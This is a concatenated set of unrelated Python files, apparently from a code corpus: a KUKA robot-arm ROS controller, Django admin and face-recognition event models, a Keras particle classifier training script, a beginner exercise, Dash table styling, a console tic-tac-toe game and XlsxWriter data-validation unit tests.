# print(k, self.scene.__dict__[k])
# # print(self.scene)
# print(self.scene.get_known_object_names())
# print(self.scene.get_attached_objects())
# exit()
self.group.set_max_velocity_scaling_factor(0.05)
self.group.set_max_acceleration_scaling_factor(0.05)
current_pose = self.group.get_current_pose(end_effector_link='iiwa_link_ee').pose
self._joint_efforts = 0
self._joint_vel = 0
self._joint_name = 0
self._header = None
pose = PoseStamped()
self.upright_constraints = Constraints()
self.upright_constraints.name = "upright"
orientation_constraint = OrientationConstraint()
orientation_constraint.header.frame_id = self.group.get_planning_frame()
orientation_constraint.link_name = self.group.get_end_effector_link()
pose.pose.orientation.x = 1.0
pose.pose.orientation.y = 0.0
pose.pose.orientation.z = 0.0
pose.pose.orientation.w = 0.0
orientation_constraint.orientation = pose.pose.orientation
orientation_constraint.absolute_x_axis_tolerance = .7#3.0
orientation_constraint.absolute_y_axis_tolerance = .7#3.0
orientation_constraint.absolute_z_axis_tolerance = 3.1415
#orientation_constraint.absolute_z_axis_tolerance = 3.14 #ignore this axis
orientation_constraint.weight = 1
self.upright_constraints.orientation_constraints.append(orientation_constraint)
self.group.allow_replanning(True)
self.group.allow_looking(True)
workspace = [0.5,-0.3,0.15,0.7,0.2,0.25]
# self.group.set_workspace(workspace)
# self.group.set_path_constraints(self.upright_constraints)
self.traj_num = -1
self.im_num = 0
self.MAX_PATH_LENGTH = 15
def Robot_State(self):
if len(self.group.get_current_joint_values())>0:
return True
else:
return False
def State_callback(self,data):
self._joint_efforts = data.effort
self._joint_vel = data.velocity
self._joint_name = data.name
self._header = data.header
def _calc_plan_statistics(self, plan, print_stats=False):
if len(plan.joint_trajectory.points) == 0:
rospy.logerr("Plan is empty. No statistics will be calculated")
return
total_distances = [0] * len(plan.joint_trajectory.points[0].positions)
max_distances = [0] * len(plan.joint_trajectory.points[0].positions)
max_vels = [0] * len(plan.joint_trajectory.points[0].positions)
max_accels = [0] * len(plan.joint_trajectory.points[0].positions)
for i, point in enumerate(plan.joint_trajectory.points):
# Ignore wrist joint
for j in range(len(point.positions) - 1):
max_vels[j] = max(max_vels[j], abs(point.velocities[j]))
max_accels[j] = max(max_accels[j], abs(point.accelerations[j]))
if i > 0:
diff = abs(point.positions[j] - plan.joint_trajectory.points[i-1].positions[j])
max_distances[j] = max(max_distances[j], diff)
total_distances[j] += diff
if print_stats:
if abs(point.positions[0]) > np.pi / 2:
rospy.logerr("joint 0 to pos %f", point.positions[0])
print "Positions:", point.positions
if print_stats:
print "\n\n\n\n\n\n\n"
print "Total_distances:", total_distances
print "Total distance:", sum(total_distances)
print "max distance:", max_distances
print "max of max_distances:", max(max_distances)
print "max_vels:", max_vels
print "max of vels:", max(max_vels)
print "max_accels:", max_accels
print "max of max_accels:", max(max_accels)
print "\n\n\n\n\n\n\n"
if max(max_distances) > 0.1:
rospy.logerr("Max distance: %f", max(max_distances))
if sum(total_distances) > 1.5:
rospy.logerr("total move: %f", sum(total_distances))
return sum(total_distances)
def _plan_to_position(self, position):
pose = [position[0],
position[1],
position[2],
np.pi,
0.0,
0.0]
replan_count = 0
self.group.set_pose_target(pose, end_effector_link='iiwa_link_ee')
plan = self.group.plan()
move_distance = self._calc_plan_statistics(plan)
print("plan length is", len(plan.joint_trajectory.points) )
while len(plan.joint_trajectory.points) > self.MAX_PATH_LENGTH:
print("Replan after plan length:", len(plan.joint_trajectory.points))
print("replanned", replan_count, "times")
pose[5] = 2 * np.pi * random.random()
self.group.set_pose_target(pose, end_effector_link='iiwa_link_ee')
plan = self.group.plan()
replan_count += 1
# if replan_count > 20 and len(plan.joint_trajectory.points) < 20:
# rospy.logerr("Exiting with lower standards. This make break")
# break
move_distance = self._calc_plan_statistics(plan)
if replan_count > 20:
rospy.logerr("Planning failed. Attempting to reset position")
self.move_kuka_to_neutral()
replan_count = 0
self._calc_plan_statistics(plan, print_stats=True)
return plan
def move_kuka_to_neutral(self):
plan = self._plan_to_position([0.6,-0.05,0.4])
# NEUTRAL_POSE= [0.6,-0.05,0.4,3.14159, 0.0, 0.0]
# current_pose = self.group.get_current_pose(end_effector_link='iiwa_link_ee').pose
# # print(self.group.get_current_joint_values())
# # self.group.set_position_target(NEUTRAL_POSE[:3], end_effector_link='iiwa_link_ee')
# self.group.set_pose_target(NEUTRAL_POSE, end_effector_link='iiwa_link_ee')
# plan = self.group.plan()
# print("Plan length:", len(plan.joint_trajectory.points))
# while len(plan.joint_trajectory.points) > 15:
# print("Trying new random orientation")
# print("Plan length:", len(plan.joint_trajectory.points))
# NEUTRAL_POSE = [NEUTRAL_POSE[0], NEUTRAL_POSE[1], NEUTRAL_POSE[2], NEUTRAL_POSE[3], NEUTRAL_POSE[4], 2 * np.pi * random.random()]
# self.group.set_pose_target(NEUTRAL_POSE, end_effector_link='iiwa_link_ee')
# plan = self.group.plan()
# print(self.group.get_current_joint_values())
print("plan length executed is", len(plan.joint_trajectory.points) )
if not plan.joint_trajectory.points:
print "[ERROR] No trajectory found"
else:
# print(self.group.get_joint_value_target())
self.group.go(wait=True)
self.traj_num = self.traj_num + 1
def move_kuka_to_eep(self, target_pose):
p, q = target_pose[:3], target_pose[3:]
if p[0]>0.68:
p[0] = 0.68
elif p[0]<0.52:
p[0] = 0.52
if p[1]>0.18:
p[1] = 0.18
elif p[1]<-0.28:
p[1] = -0.28
if p[2]>0.25:
p[2] = 0.25
elif p[2]<0.15:
p[2] = 0.15
plan = self._plan_to_position(p)
# goal_pose = [p[0], p[1], p[2], 3.14159, 0.0, 2 * np.pi * random.random()]
current_pose = self.group.get_current_pose(end_effector_link='iiwa_link_ee').pose.position
# # print(current_pose.position)
# # print(current_pose.orientation)
# self.group.set_pose_target(goal_pose, end_effector_link='iiwa_link_ee')
# # self.group.set_position_target(goal_pose[:3], end_effector_link='iiwa_link_ee')
# plan = self.group.plan()
# print("Plan length:", len(plan.joint_trajectory.points))
# while len(plan.joint_trajectory.points) > self.MAX_PATH_LENGTH:
# print("Trying new random orientation")
# print("Plan length:", len(plan.joint_trajectory.points))
# goal_pose = [p[0], p[1], p[2], 3.14159, 0.0, 2 * np.pi * random.random()]
# self.group.set_pose_target(goal_pose, end_effector_link='iiwa_link_ee')
# plan = self.group.plan()
print("plan length executed is", len(plan.joint_trajectory.points) )
if not plan.joint_trajectory.points:
print "[ERROR] No trajectory found"
else:
self.group.go(wait=True)
target_position = np.asarray([p[0],p[1],p[2]])
current_position = np.asarray([current_pose.x,current_pose.y,current_pose.z])
# while(np.linalg.norm(current_position-target_position)>0.01):
# current_pose = self.group.get_current_pose(end_effector_link='iiwa_link_ee').pose.position
# current_position = np.asarray([current_pose.x,current_pose.y,current_pose.z])
# print("position difference is = ", np.sum(current_position-target_position))
def move_kuka_to_ja(self):
pass
"""
:param waypoints: List of joint angle arrays. If len(waypoints) == 1: then go directly to point.
Otherwise: take trajectory that ends at waypoints[-1] and passes through each intermediate waypoint
:param duration: Total time trajectory will take before ending
"""
#*** Probably dont need this *** ###
def redistribute_kuka_objects(self):
P1 = [0.5,-0.05,0.2,3.14159, 0.0, 0.0]
P2 = [0.6,-0.05,0.2,3.14159, 0.0, 0.0]
P3 = [0.5,-0.3,0.4,3.14159, 0.0, 0.0]
P4 = [0.5,-0.3,0.2,3.14159, 0.0, 0.0]
P5 = [0.6,-0.15,0.2,3.14159, 0.0, 0.0]
P6 = [0.6,-0.3,0.4,3.14159, 0.0, 0.0]
P7 = [0.6,-0.3,0.2,3.14159, 0.0, 0.0]
P8 = [0.6,-0.15,0.2,3.14159, 0.0, 0.0]
P9 = [0.7,-0.3,0.4,3.14159, 0.0, 0.0]
P10 = [0.7,-0.3,0.2,3.14159, 0.0, 0.0]
P11 = [0.6,-0.15,0.2,3.14159, 0.0, 0.0]
P12 = [0.7,-0.05,0.4,3.14159, 0.0, 0.0]
P13 = [0.7,-0.05,0.2,3.14159, 0.0, 0.0]
P14 = [0.6,-0.05,0.2,3.14159, 0.0, 0.0]
P15 = [0.7,0.2,0.4,3.14159, 0.0, 0.0]
P16 = [0.7,0.2,0.2,3.14159, 0.0, 0.0]
P17 = [0.6,0.1,0.2,3.14159, 0.0, 0.0]
P18 = [0.6,0.2,0.4,3.14159, 0.0, 0.0]
P19 = [0.6,0.2,0.2,3.14159, 0.0, 0.0]
P20 = [0.6,0.1,0.2,3.14159, 0.0, 0.0]
P21 = [0.5,0.2,0.4,3.14159, 0.0, 0.0]
P22 = [0.5,0.2,0.2,3.14159, 0.0, 0.0]
P23 = [0.6,0.1,0.2,3.14159, 0.0, 0.0]
Pn= [0.5,-0.05,0.4,3.14159, 0.0, 0.0]
redist_traj = [Pn,P1,P2,P3,P4,P5,P6,P7,P8,P9,P10,P11,P12,P13,P14,P15,P16,P17,P18,P19,P20,P21,P22,P23,Pn]
for i in redist_traj:
self.group.set_pose_target(i, end_effector_link='iiwa_link_ee')
plan = self.group.plan()
if not plan.joint_trajectory.points:
print "[ERROR] No trajectory found"
else:
self.group.go(wait=True)
current_pos = self.group.get_current_pose(end_effector_link='iiwa_link_ee').pose.position
current_position = np.asarray([current_pos.x,current_pos.y,current_pos.z])
target_position = np.asarray(i[0:3])
# print(target_position)
while(abs(np.sum(current_position-target_position))>0.01):
counter = 0
current_pos = self.group.get_current_pose(end_effector_link='iiwa_link_ee').pose.position
current_position = np.asarray([current_pos.x,current_pos.y,current_pos.z])
print("position difference is = ", np.sum(current_position-target_position))
counter = counter + 1
if counter>10000000:
return
"""
Play pre-recorded trajectory that sweeps objects into center of bin
"""
pass
def get_kuka_state(self):
# return joint_angles, joint_velocities, eep
return self.group.get_current_joint_values(),self.get_kuka_joint_angles_velocity(),self.get_kuka_cartesian_pose()
# return self.get_kuka_joint_angles(), self.get_kuka_joint_angles_velocity(), self.get_kuka_cartesian_pose()
def get_kuka_joint_angles(self):
#returns current joint angles
return self.group.get_current_joint_values()
def get_kuka_joint_angles_velocity(self):
#returns current joint angle velocities
# rospy.sleep(0.01)
return self._joint_vel
def get_kuka_joint_angles_names(self):
#returns current joint angle velocities
# rospy.sleep(0.01)
return self._joint_name
def get_kuka_joint_angles_effort(self):
#returns current joint angle velocities
# rospy.sleep(0.01)
return self._joint_efforts
def get_kuka_cartesian_pose(self):
#Returns cartesian end-effector pose
pose = self.group.get_current_pose(end_effector_link='iiwa_link_ee').pose
eep = np.array([pose.position.x,
pose.position.y,
pose.position.z,
pose.orientation.w,
pose.orientation.x,
pose.orientation.y,
pose.orientation.z])
return eep
def get_xyz_quat(self):
# separates cartesian pose into xyz, quaternion arrays
position = self.get_kuka_cartesian_pose().position
orient = self.get_kuka_cartesian_pose().orientation
return position.x,position.y,position.z,orient.x,orient.y,orient.z,orient.w
def save_images(self):
# base_path = "/home/server/Desktop/saved_images/"
# data = rospy.wait_for_message('/camera1/usb_cam/image_raw', Image)
# print("wait_for_message stamp:", data.header.stamp)
# try:
# cv_image = self.bridge.imgmsg_to_cv2(data, "passthrough")
# except CvBridgeError as e:
# print(e)
# print "Saved to: ", base_path+str(0)+".jpg"
# cv2.cvtColor(cv_image, cv2.COLOR_BGR2RGB, cv_image)
# cv2.imwrite(join(base_path, "frame{:06d}.jpg".format(0)), cv_image)#*255)
### ********************#####
path = "/home/server/Desktop/traj_images/" +str(self.traj_num)
folders = ['Image0','Image1','Image2']
for folder in folders:
base_path = os.path.join(path,folder)
if not os.path.exists(base_path):
os.makedirs(base_path)
data0 = rospy.wait_for_message('/camera1/usb_cam/image_raw', Image)
data1 = rospy.wait_for_message('/camera2/usb_cam/image_raw', Image)
data2 = rospy.wait_for_message('/camera3/usb_cam/image_raw', Image)
print("wait_for_message stamp of camera 1:", data0.header.stamp,"\n")
print("wait_for_message stamp of camera 2:", data1.header.stamp,"\n")
print("wait_for_message stamp of camera 3:", data2.header.stamp,"\n")
try:
cv_image0 = self.bridge.imgmsg_to_cv2(data0, "passthrough")
cv_image1 = self.bridge.imgmsg_to_cv2(data1, "passthrough")
cv_image2 = self.bridge.imgmsg_to_cv2(data2, "passthrough")
except CvBridgeError as e:
print(e)
print "Saved to: ", path+str(self.traj_num)
cv2.cvtColor(cv_image0, cv2.COLOR_BGR2RGB, cv_image0)
cv2.cvtColor(cv_image1, cv2.COLOR_BGR2RGB, cv_image1)
cv2.cvtColor(cv_image2, cv2.COLOR_BGR2RGB, cv_image2)
cv2.imwrite(join(path,"Image0", "frame{:06d}.jpg".format(self.im_num)), cv_image0)#*255)
cv2.imwrite(join(path,"Image1", "frame{:06d}.jpg".format(self.im_num)), cv_image1)#*255)
cv2.imwrite(join(path,"Image2", "frame{:06d}.jpg".format(self.im_num)), cv_image2)#*255)
if __name__ == '__main__':
rospy.init_node("standalone_robot_controller", anonymous=True)
kuka_obj = KukaInterface()
try:
kuka_obj.move_kuka_to_neutral()
except rospy.ROSInterruptException:
pass
|
py | 1a344e5e94adc38154a7e1887e7d14c3c5aceca2 | from django.contrib import admin
from .models import *
# Register your models here.
from import_export.admin import ImportExportModelAdmin
class productAdmin(ImportExportModelAdmin):
list_display = ('modelno','size','price')
search_fields = ('modelno','size','water','gas','air','wpf','density','vescosity','temp','pressure','distance','price')
list_per_page = 15
admin.site.register(product,productAdmin) |
py | 1a344f791b8da620ea5bd366fdd935006b913861 | #!/usr/bin/env python2.7
from sys import exit, stdout, argv
from os import environ, system
environ['KERAS_BACKEND'] = 'tensorflow'
import numpy as np
import signal
from keras.layers import Input, Dense, Dropout, concatenate, LSTM, BatchNormalization, Conv1D, concatenate, CuDNNLSTM
from keras.models import Model
from keras.callbacks import ModelCheckpoint, LambdaCallback, TensorBoard
from keras.optimizers import Adam, SGD
from keras.utils import np_utils
from keras import backend as K
K.set_image_data_format('channels_last')
from subtlenet import config
from subtlenet.generators.gen import make_coll, generate
'''
some global definitions
'''
NEPOCH = 20
APOSTLE = 'v1'
system('cp %s particle_models/train_%s.py'%(argv[0], APOSTLE))
config.limit = 50
#config.DEBUG = True
'''
instantiate data loaders
'''
basedir = '/local/snarayan/genarrays/v_deepgen_1'
#basedir = '/fastscratch/snarayan/genarrays/v_deepgen_0'
top = make_coll(basedir + '/PARTITION/Top_*_CATEGORY.npy')
hig = make_coll(basedir + '/PARTITION/Higgs_*_CATEGORY.npy')
qcd = make_coll(basedir + '/PARTITION/QCD_*_CATEGORY.npy')
data = [top, hig, qcd]
data[0].objects['train']['particles'].load(memory=False)
dims = data[0].objects['train']['particles'].data.data.shape
dims = (None, dims[1], dims[2]-1) # need to exclude the last column
if config.limit is not None:
dims = (None, config.limit, dims[-1]) # override
'''
first build the classifier!
'''
# set up data
opts = {
'learn_mass' : True,
'learn_pt' : True,
}
classifier_train_gen = generate(data, partition='train', batch=500, **opts)
classifier_validation_gen = generate(data, partition='validate', batch=1000, **opts)
classifier_test_gen = generate(data, partition='test', batch=10, **opts)
test_i, test_o, test_w = next(classifier_test_gen)
# build all inputs
input_particles = Input(shape=(dims[1], dims[2]), name='input_particles')
input_mass = Input(shape=(1,), name='input_mass')
input_pt = Input(shape=(1,), name='input_pt')
inputs = [input_particles, input_mass, input_pt]
# now build the particle network
h = BatchNormalization(momentum=0.6, name='particles_input_bnorm')(input_particles)
h = Conv1D(32, 2, activation='relu', name='particles_conv0', kernel_initializer='lecun_uniform', padding='same')(h)
h = BatchNormalization(momentum=0.6, name='particles_conv0_bnorm')(h)
h = Conv1D(16, 4, activation='relu', name='particles_conv1', kernel_initializer='lecun_uniform', padding='same')(h)
h = BatchNormalization(momentum=0.6, name='particles_conv1_bnorm')(h)
h = CuDNNLSTM(100, name='particles_lstm')(h)
h = Dropout(0.1)(h)
h = BatchNormalization(momentum=0.6, name='particles_lstm_norm')(h)
h = Dense(100, activation='relu',name='particles_lstm_dense',kernel_initializer='lecun_uniform')(h)
particles_final = BatchNormalization(momentum=0.6,name='particles_lstm_dense_norm')(h)
# merge everything
to_merge = [particles_final, input_mass, input_pt]
h = concatenate(to_merge)
for i in xrange(1,5):
h = Dense(50, activation='relu',name='final_dense%i'%i)(h)
if i%2:
h = Dropout(0.1)(h)
h = BatchNormalization(momentum=0.6,name='final_dense%i_norm'%i)(h)
y_hat = Dense(config.n_truth, activation='softmax')(h)
classifier = Model(inputs=inputs, outputs=[y_hat])
classifier.compile(optimizer=Adam(lr=0.0005),
loss='categorical_crossentropy',
metrics=['accuracy'])
print '########### CLASSIFIER ############'
classifier.summary()
print '###################################'
# ctrl+C now triggers a graceful exit
def save_classifier(name='classifier', model=classifier):
model.save('particle_models/%s_%s.h5'%(name, APOSTLE))
def save_and_exit(signal=None, frame=None, name='classifier', model=classifier):
save_classifier(name, model)
flog.close()
exit(1)
signal.signal(signal.SIGINT, save_and_exit)
classifier.fit_generator(classifier_train_gen,
steps_per_epoch=3000,
epochs=NEPOCH,
validation_data=classifier_validation_gen,
validation_steps=1000,
callbacks = [ModelCheckpoint('particle_models/classifier_conv_%s_{epoch:02d}_{val_loss:.5f}.h5'%APOSTLE)],
)
save_classifier()
|
py | 1a34501fe0c9b85dba2ff08576579104ca20c8a4 | # Desenvolva um programa que leia o nome, idade, e sexo de 4 pessoas.
# No final do progrma, mostre:
#
# - A média de idade do grupo
# - O nome do homem mais velho
# - Quantas mulheres tem menos de 20 anos
nome_velho = ''
idade_maior = 0
soma = 0
cont_media = 0
cont_feminino = 0
for c in range(1, 5):
nome = str(input('Qual seu nome: ')).strip().upper()
idade = int(input('Qual a sua idade: '))
sexo = str(input('Qual o seu sexo '
'\n(F) para feminino'
'\n(M) para masculino: ')).strip().upper()
soma += idade
cont_media += 1
if idade > idade_maior and sexo == 'M':
idade_maior = idade
nome_velho = nome
if sexo == 'F' and idade < 20:
cont_feminino += 1
media = soma/cont_media
print(f'A média da idade do grupo é de {media:.2f} anos.'
f'\nO homem mais velho dor grupo é do {nome_velho} que tem {idade_maior} anos.'
f'\n{cont_feminino} mulheres tem menos de 20 anos')
|
py | 1a3450d36cca83ba1efe9acbac3486d23d93763e | from django.db import models
from pprint import pprint
from paradiso.storage_backends import FaceStorage, EventStorage
from django.urls import reverse, reverse_lazy
from rekognition import VideoDetect
def rename_guest_photo(instance, filename):
return str(instance)
class Guest(models.Model):
name = models.CharField(max_length=30, primary_key=True)
photo = models.ImageField(upload_to=rename_guest_photo, storage=FaceStorage())
external_id = models.CharField(max_length=100, null=True)
# def get_absolute_url(self):
# return reverse("eye_of_providence:guest-detail", kwargs={"pk": self.pk})
def __str__(self):
return self.name
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
analyzer = VideoDetect()
analyzer.indexFace(str(self))
face_list = analyzer.listFaces()["Faces"]
# if there is no external id, get it
if self.external_id == None:
for face in face_list:
if face['ExternalImageId'] == self.name:
self.external_id = face["FaceId"]
break
self.save()
def delete(self, *args, **kwargs):
analyzer = VideoDetect()
analyzer.deleteFace(self.external_id)
super().delete(*args, **kwargs)
def rename_event_video(instance, filename):
return str(instance)
class Event(models.Model):
name = models.CharField(max_length=30)
known_guests = models.ManyToManyField(Guest, blank=True)
potential_faces = models.IntegerField(blank=True, null=True)
video = models.FileField(upload_to=rename_event_video, storage=EventStorage())
def analyse(self):
analyzer = VideoDetect()
matches = analyzer.main(str(self))
self.potential_faces = matches[1]
for guest_name in matches[0]:
guest = Guest.objects.get(name=guest_name)
self.known_guests.add(guest)
self.save()
# def save(self, *args, **kwargs):
# super().save(*args, **kwargs)
# def delete(self, *args, **kwargs):
# super().delete(*args, **kwargs)
# def get_absolute_url(self):
# return reverse("eye_of_providence:event-detail", kwargs={"pk": self.pk})
def __str__(self):
return str(self.name)
|
py | 1a345149fe3d1850f6f0f5adb30ebdc620d002c3 | def data_bars(df, column):
n_bins = 100
bounds = [i * (1.0 / n_bins) for i in range(n_bins + 1)]
ranges = [
((df[column].max() - df[column].min()) * i) + df[column].min()
for i in bounds
]
styles = []
for i in range(1, len(bounds)):
min_bound = ranges[i - 1]
max_bound = ranges[i]
max_bound_percentage = bounds[i] * 100
styles.append({
'if': {
'filter_query': (
'{{{column}}} >= {min_bound}' +
(' && {{{column}}} < {max_bound}' if (i < len(bounds) - 1) else '')
).format(column=column, min_bound=min_bound, max_bound=max_bound),
'column_id': column
},
'background': (
"""
linear-gradient(90deg,
#0074D9 0%,
#0074D9 {max_bound_percentage}%,
white {max_bound_percentage}%,
white 100%)
""".format(max_bound_percentage=max_bound_percentage)
),
'paddingBottom': 2,
'paddingTop': 2
})
return styles
def data_bars_diverging(df, column, color_above='#3D9970', color_below='#FF4136'):
n_bins = 100
bounds = [i * (1.0 / n_bins) for i in range(n_bins + 1)]
col_max = df[column].max()
col_min = df[column].min()
ranges = [
((col_max - col_min) * i) + col_min
for i in bounds
]
midpoint = (col_max + col_min) / 2.
styles = []
for i in range(1, len(bounds)):
min_bound = ranges[i - 1]
max_bound = ranges[i]
min_bound_percentage = bounds[i - 1] * 100
max_bound_percentage = bounds[i] * 100
style = {
'if': {
'filter_query': (
'{{{column}}} >= {min_bound}' +
(' && {{{column}}} < {max_bound}' if (i < len(bounds) - 1) else '')
).format(column=column, min_bound=min_bound, max_bound=max_bound),
'column_id': column
},
'paddingBottom': 2,
'paddingTop': 2
}
if max_bound > midpoint:
background = (
"""
linear-gradient(90deg,
white 0%,
white 50%,
{color_above} 50%,
{color_above} {max_bound_percentage}%,
white {max_bound_percentage}%,
white 100%)
""".format(
max_bound_percentage=max_bound_percentage,
color_above=color_above
)
)
else:
background = (
"""
linear-gradient(90deg,
white 0%,
white {min_bound_percentage}%,
{color_below} {min_bound_percentage}%,
{color_below} 50%,
white 50%,
white 100%)
""".format(
min_bound_percentage=min_bound_percentage,
color_below=color_below
)
)
style['background'] = background
styles.append(style)
return styles
|
py | 1a3451b4a3a3b5757a0b5dc5f3f211c5421cb439 | from Color_Console import *
import platform
import re
from logic import *
def clear_console():
if is_linux:
os.system('clear')
else:
os.system('cls')
def get_move():
move = input().upper()
while not re.match("(1|2|3)-(A|B|C)", move):
ctext("Please observe format", "red")
move = input().upper()
return move
if __name__ == "__main__":
game = Game()
is_linux = platform.system()
while not game.have_winner() and not game.have_draw():
clear_console()
game.print_grid()
print("")
print(f"Now {game.paint_symbol(game.current_symbol)} move")
ctext("*Move must be printed in format DIGIT-SYMBOL where DIGIT is column, SYMBOL is row as on the above grid", "yellow")
move = get_move()
while not game.put(move):
ctext("Wrong move", "red")
move = get_move()
else:
clear_console()
game.print_grid()
print("")
if game.have_winner():
ctext(f"Winner is {game.get_winner()}", "green")
else:
ctext("Draw", "yellow")
|
py | 1a34521fa4f22719f3092aafb887c3f53afbecc5 | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2020, John McNamara, [email protected]
#
import unittest
from datetime import date, time
from ...compatibility import StringIO
from ...worksheet import Worksheet
from ..helperfunctions import _xml_to_list
class TestWriteDataValidations(unittest.TestCase):
"""
Test the Worksheet _write_data_validations() method.
"""
def setUp(self):
self.maxDiff = None
self.fh = StringIO()
self.worksheet = Worksheet()
self.worksheet._set_filehandle(self.fh)
def test_write_data_validations_1(self):
"""
Test 1 Integer between 1 and 10.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_2(self):
"""
Test 2 Integer not between 1 and 10.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'not between',
'minimum': 1,
'maximum': 10,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="notBetween" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_3(self):
"""
Test 3,4,5 Integer == 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'equal to',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="equal" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_4(self):
"""
Test 3,4,5 Integer == 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': '=',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="equal" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_5(self):
"""
Test 3,4,5 Integer == 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': '==',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="equal" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_6(self):
"""
Test 6,7,8 Integer != 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'not equal to',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="notEqual" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_7(self):
"""
Test 6,7,8 Integer != 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': '<>',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="notEqual" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_8(self):
"""
Test 6,7,8 Integer != 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': '!=',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="notEqual" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_9(self):
"""
Test 9,10 Integer > 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'greater than',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="greaterThan" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_10(self):
"""
Test 9,10 Integer > 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': '>',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="greaterThan" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_11(self):
"""
Test 11,12 Integer < 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'less than',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="lessThan" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_12(self):
"""
Test 11,12 Integer < 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': '<',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="lessThan" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_13(self):
"""
Test 13,14 Integer >= 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'greater than or equal to',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="greaterThanOrEqual" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_14(self):
"""
Test 13,14 Integer >= 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': '>=',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="greaterThanOrEqual" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
